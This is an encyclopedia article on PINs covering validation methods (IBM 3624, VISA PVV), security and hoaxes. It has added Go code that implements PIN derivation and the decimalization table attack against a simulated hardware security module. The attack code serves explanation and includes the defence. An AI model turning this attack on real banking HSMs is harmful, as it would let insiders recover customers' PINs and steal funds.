Personal identification number
A personal identification number (PIN, pronounced "pin") is a secret numeric password shared between a user and a system that can be used to authenticate the user to the system. Typically, the user is required to provide a non-confidential user identifier or token (the user ID) and a confidential PIN to gain access to the system. Upon receiving the user ID and PIN, the system looks up (or, with the methods described below, regenerates) the PIN for that user ID and compares it with the received PIN. The user is granted access only when the number entered matches the number the system holds or regenerates. Hence, despite the name, a PIN does not personally identify the user.

PINs are most often used for automated teller machines (ATMs) but are increasingly used at the point of sale, for debit cards and credit cards. Throughout Europe and Canada the traditional in-store credit card signing process is increasingly being replaced with a system in which the customer is asked to enter their PIN instead of signing. In the UK and Ireland this goes under the term 'Chip and PIN', since PINs were introduced at the same time as EMV chips on the cards. In other parts of the world, PINs were in use before the introduction of EMV. Apart from financial uses, GSM mobile phones usually allow the user to enter a PIN of between four and eight digits. The PIN is recorded in the SIM card.

In 2006, James Goodfellow, the inventor of the personal identification number, was awarded an OBE in the Queen's Birthday Honours List.

PIN length

The concept of a PIN originates with the inventor of the ATM, John Shepherd-Barron. One day in 1967, while thinking about more efficient ways banks could disburse cash to their customers, it occurred to him that the vending machine model was a proven fit. For authentication Shepherd-Barron at first envisioned a six-digit numeric code, given what he could reliably remember. His wife however preferred four digits, which became the most commonly used length.

ISO 9564-1, the international standard for PIN management and security, allows for PINs from four up to twelve digits, but also notes that "For usability reasons, an assigned numeric PIN should not exceed six digits in length."

PIN validation

There are several main methods of validating PINs. The operations discussed below are usually performed within a hardware security module (HSM), so that the PIN keys and cleartext PINs never appear on the host system.

IBM 3624

The IBM method is used to generate what is termed a natural PIN. The natural PIN is generated by encrypting the primary account number (PAN), using an encryption key generated specifically for the purpose, sometimes referred to as the PIN generation key (PGK), and then converting the leading hexadecimal digits of the result into decimal digits with a decimalization table (typically the table that maps 0-9 to themselves and A-F to 0-5). This PIN is therefore directly related to the primary account number. To validate the PIN, the issuing bank regenerates the PIN using the above method, and compares this with the entered PIN.

Natural PINs cannot be user selectable because they are derived from the PAN. If the card is reissued with a new PAN, a new PIN must be generated.

Natural PINs allow banks to issue PIN reminder letters, since the PIN can be regenerated from the PAN at any time.

IBM 3624 + offset

To allow user-selectable PINs it is possible to store a PIN offset value. The offset is found by subtracting the natural PIN from the customer-selected PIN, digit by digit modulo 10, with no borrow between digits. For example, if the natural PIN is 1234 and the user wishes to have a PIN of 2345, the offset is 1111; a natural PIN of 1999 and a selected PIN of 2000 also give an offset of 1111.

The offset can be stored either on the card track data, or in a database at the card issuer.

To validate the PIN, the issuing bank calculates the natural PIN as in the above method, adds the offset digit by digit modulo 10, and compares the result with the entered PIN.

VISA method

The VISA method is used by many card schemes and is not VISA-specific. It generates a PIN verification value (PVV). Similar to the offset value, the PVV can be stored on the card's track data or in a database at the card issuer. This stored value is called the reference PVV.

The VISA method takes the rightmost eleven digits of the PAN excluding the check digit, a PIN verification key index (PVKI, chosen from one to six) and the leftmost four digits of the PIN, and concatenates them into a 16-digit (64-bit) value. The PVKI selects a PIN verification key (PVK, of 128 bits) under which this value is encrypted. The PVV is extracted from the ciphertext by scanning it for the first four decimal digits; if fewer than four are found, the scan is repeated for the hexadecimal digits A to F, each reduced by 10.

To validate the PIN, the issuing bank calculates a PVV from the entered PIN and the PAN and compares it with the reference PVV. If the two match, the correct PIN is deemed to have been entered.

Unlike the IBM method, the VISA method does not derive a PIN. The PVV is used only to confirm that the PIN entered at the terminal is the one that was used to generate the reference PVV. The PIN used to generate a PVV can be randomly generated, user selected, or even derived using the IBM method. Because the PVV is only four digits long it does not identify the PIN uniquely: about one in every 10,000 wrong PINs produces the same PVV and would also be accepted, which roughly doubles a guesser's chance per attempt but is of little consequence given the attempt limit.
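Both methods carried through in code, as an added example that is not part of the original article and not any vendor's HSM implementation. It is written in Go because the standard library provides triple DES; the keys, the PAN and the choice of validation data for the IBM method (the PAN padded with F to 16 hex digits, which varies between implementations) are constructed assumptions, and in practice every function below would run inside the HSM:

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Constructed test material: a 16-byte PIN generation key, a 16-byte PIN
// verification key and a PAN. Real keys never leave the HSM.
var (
	pgk = mustHex("0123456789abcdeffedcba9876543210")
	pvk = mustHex("00112233445566778899aabbccddeeff")
	pan = "4111111111111111"
)

const standardTable = "0123456789012345" // usual IBM 3624 decimalization table

func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

// tdesBlock encrypts one 8-byte block under a double-length key with
// two-key triple DES, the primitive payment HSMs use for both methods.
func tdesBlock(key16, block []byte) []byte {
	c, err := des.NewTripleDESCipher(append(append([]byte{}, key16...), key16[:8]...))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// decimalize maps hex digits through a 16-entry decimalization table.
func decimalize(hexStr, table string) string {
	out := make([]byte, len(hexStr))
	for i, h := range []byte(hexStr) {
		out[i] = table[strings.IndexByte("0123456789abcdef", h)]
	}
	return string(out)
}

// addDigits returns a + sign*b digit by digit modulo 10: sign -1 gives the
// offset of a selected PIN over the natural PIN, sign +1 re-applies it.
func addDigits(a, b string, sign int) string {
	out := make([]byte, len(a))
	for i := range a {
		out[i] = byte('0' + (10+int(a[i]-'0')+sign*int(b[i]-'0'))%10)
	}
	return string(out)
}

// naturalPIN is the IBM 3624 method: encrypt the validation data (assumed
// here to be the PAN padded with F to 16 hex digits) under the PGK and
// decimalize the leading pinLen hex digits of the ciphertext.
func naturalPIN(pgk []byte, pan, table string, pinLen int) string {
	data := (pan + strings.Repeat("f", 16))[:16]
	ct := hex.EncodeToString(tdesBlock(pgk, mustHex(data)))
	return decimalize(ct[:pinLen], table)
}

// verifyIBM regenerates the natural PIN, applies the offset stored on the
// track or in the issuer database and compares with the entered PIN.
func verifyIBM(pgk []byte, pan, table, offset, entered string) bool {
	return addDigits(naturalPIN(pgk, pan, table, len(entered)), offset, 1) == entered
}

// visaPVV forms the 16-digit TSP (11 rightmost PAN digits excluding the
// check digit, the PVKI, the first four PIN digits), encrypts it under the
// PVK and takes the first four decimal digits of the ciphertext; if fewer
// than four occur, hex digits A-F minus 10 fill the remaining places.
func visaPVV(pvk []byte, pan string, pvki int, pin string) string {
	body := pan[:len(pan)-1]
	tsp := body[len(body)-11:] + fmt.Sprint(pvki) + pin[:4]
	ct := hex.EncodeToString(tdesBlock(pvk, mustHex(tsp)))
	var pvv []byte
	for _, pass := range []string{"0123456789", "abcdef"} {
		for _, c := range []byte(ct) {
			if i := strings.IndexByte(pass, c); i >= 0 && len(pvv) < 4 {
				pvv = append(pvv, '0'+byte(i))
			}
		}
	}
	return string(pvv)
}

func main() {
	nat := naturalPIN(pgk, pan, standardTable, 4)
	off := addDigits("2345", nat, -1) // customer chose 2345
	fmt.Println("natural", nat, "offset", off, "IBM verify:", verifyIBM(pgk, pan, standardTable, off, "2345"))
	ref := visaPVV(pvk, pan, 1, "2345") // reference PVV stored with the card
	fmt.Println("PVV", ref, "VISA verify:", visaPVV(pvk, pan, 1, "2345") == ref)
}
```

Running it prints a natural PIN, the offset that turns it into 2345 and a four-digit PVV. Note the asymmetry described above: verifyIBM rejects a wrong PIN deterministically, whereas a wrong PIN collides with the reference PVV about once in 10,000 times.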

PIN security

Financial PINs are often four-digit numbers in the range 0000-9999, giving 10,000 possible values. Switzerland is a notable exception, with six-digit PINs being issued by default. Some banks do not issue numbers where all digits are identical (such as 1111, 2222, ...), consecutive (1234, 2345, ...), numbers that start with one or more zeroes, or the last four digits of the customer's social security number; excluding such values shrinks the space slightly, but removes the PINs a guesser would try first. Many PIN verification systems allow three attempts, thereby giving a card thief a 0.03% (3 in 10,000) probability of guessing the correct PIN before the card is blocked. This holds only if all PINs are equally likely and the attacker has no further information available, which has not been the case with some of the many PIN generation and verification algorithms that banks and ATM manufacturers have used in the past.

In 2002 two PhD students at the University of Cambridge, Piotr Zieliński and Mike Bond, discovered a security flaw in the PIN generation system of the IBM 3624, which was duplicated in most later hardware. Known as the decimalization table attack, the flaw would allow someone who has access to a bank's computer system to determine the PIN for an ATM card in an average of 15 guesses. The weakness is that the decimalization table is passed to the HSM by the host as a parameter of the PIN verification command rather than being fixed inside the module, so an insider can submit crafted tables and learn, from nothing more than the HSM's accept or reject answers, which hexadecimal digits make up the encrypted PAN, without ever seeing a key or a cleartext PIN.
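The attack in code, as an added example that is not from the original article and not the published paper's own tooling. The HSM is modelled with a constructed constant standing in for the leading hex digits of the encrypted PAN (the attack never needs DES itself, only the accept or reject answers), the function names and the all-zero-but-one table layout are the example's own, and this straightforward variant needs somewhat more queries than the optimised strategy's average of 15:

```go
package main

import (
	"fmt"
	"math/bits"
	"strings"
)

const (
	hexDigits     = "0123456789abcdef"
	standardTable = "0123456789012345" // the usual IBM 3624 decimalization table
)

// decimalize maps each hex digit through a 16-entry decimalization table.
func decimalize(hexStr, table string) string {
	out := make([]byte, len(hexStr))
	for i, h := range []byte(hexStr) {
		out[i] = table[strings.IndexByte(hexDigits, h)]
	}
	return string(out)
}

// addOffset adds a PIN offset to a natural PIN, digit by digit modulo 10.
func addOffset(natural, offset string) string {
	out := make([]byte, len(natural))
	for i := range natural {
		out[i] = byte('0' + (int(natural[i]-'0')+int(offset[i]-'0'))%10)
	}
	return string(out)
}

// hsm models the IBM 3624 verify command as the bank's host sees it: the
// caller chooses table, offset and trial PIN and learns only yes or no.
// hidden stands for the leading hex digits of the encrypted PAN, which a
// real HSM computes internally; here it is a constructed constant.
type hsm struct {
	hidden  string
	queries int
}

func (h *hsm) Verify(table, offset, trial string) bool {
	h.queries++
	return addOffset(decimalize(h.hidden, table), offset) == trial
}

// recoverPIN is the decimalization table attack: an insider who may pass
// a table of their own choosing learns the hidden hex digits one value at
// a time, then applies the real table and the offset stored for the card.
func recoverPIN(h *hsm, pinLen int, realTable, realOffset string) string {
	zeros := strings.Repeat("0", pinLen)
	found := make([]byte, pinLen) // hex digit per position; 0 = not yet known
	unknown := pinLen
	for v := 0; v < 16 && unknown > 0; v++ {
		// A table that maps value v to 1 and every other value to 0.
		tbl := []byte(strings.Repeat("0", 16))
		tbl[v] = '1'
		// Stage 1: trial 0000 with offset 0000 now succeeds iff v is absent.
		if h.Verify(string(tbl), zeros, zeros) {
			continue
		}
		// Stage 2: v is present; find the still-unknown positions holding it
		// by trying a 1 in each candidate set of positions, smallest sets first.
		var free []int
		for i, f := range found {
			if f == 0 {
				free = append(free, i)
			}
		}
	search:
		for size := 1; size <= len(free); size++ {
			for mask := 1; mask < 1<<len(free); mask++ {
				if bits.OnesCount(uint(mask)) != size {
					continue
				}
				trial := []byte(zeros)
				for i, p := range free {
					if mask&(1<<i) != 0 {
						trial[p] = '1'
					}
				}
				if h.Verify(string(tbl), zeros, string(trial)) {
					for i, p := range free {
						if mask&(1<<i) != 0 {
							found[p] = hexDigits[v]
							unknown--
						}
					}
					break search
				}
			}
		}
	}
	return addOffset(decimalize(string(found), realTable), realOffset)
}

func main() {
	h := &hsm{hidden: "a3f1"} // constructed stand-in for the encrypted PAN
	fmt.Println("PIN", recoverPIN(h, 4, standardTable, "1111"), "after", h.queries, "HSM calls")
}
```

Each call costs the insider nothing, because the attempt counter that limits a card thief to three guesses at the ATM does not exist on the host-to-HSM interface; a few dozen queries therefore do what 10,000 guesses could not. The defence is to take the choice of table away from the host, by fixing it inside the HSM or binding it to the key.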

If a mobile phone PIN is entered incorrectly three times, the SIM card is blocked until a Personal Unblocking Code (PUC or PUK), provided by the service operator, is entered. If the PUC is entered incorrectly ten times, the SIM card is permanently blocked, requiring a new SIM card.

Safety practices for PINs used in device pairing (the "link key" is Bluetooth terminology for the long-term key that the PIN establishes):
  • Limit PIN usage.
  • Use the link key instead of the PIN.
  • Use inside secure environments.

"PIN number"

The term "PIN number" (hence "personal identification number number") is commonly used. This is an example of RAS syndrome (Redundant Acronym Syndrome syndrome).

Reverse PIN hoax

Rumours have circulated by e-mail claiming that, in the event of a PIN being entered into an ATM backwards, the police will be instantly alerted while money is issued as normal, as if the PIN had been entered correctly. The intention of such a scheme would be to protect victims of muggings; however, although the system has been proposed for use in some US states, no ATMs currently in existence employ this software. (Palindromic PINs such as 1221 would also have no distinct reverse.)

Related pages

  • ATM SafetyPIN software
  • ISO 9564, international standard for PIN management and security in retail banking
  • Personal Unblocking Code
  • PIN pad
  • Point of sales
  • Transaction authentication number

The source of this article is wikipedia, the free encyclopedia.  The text of this article is licensed under the GFDL.
 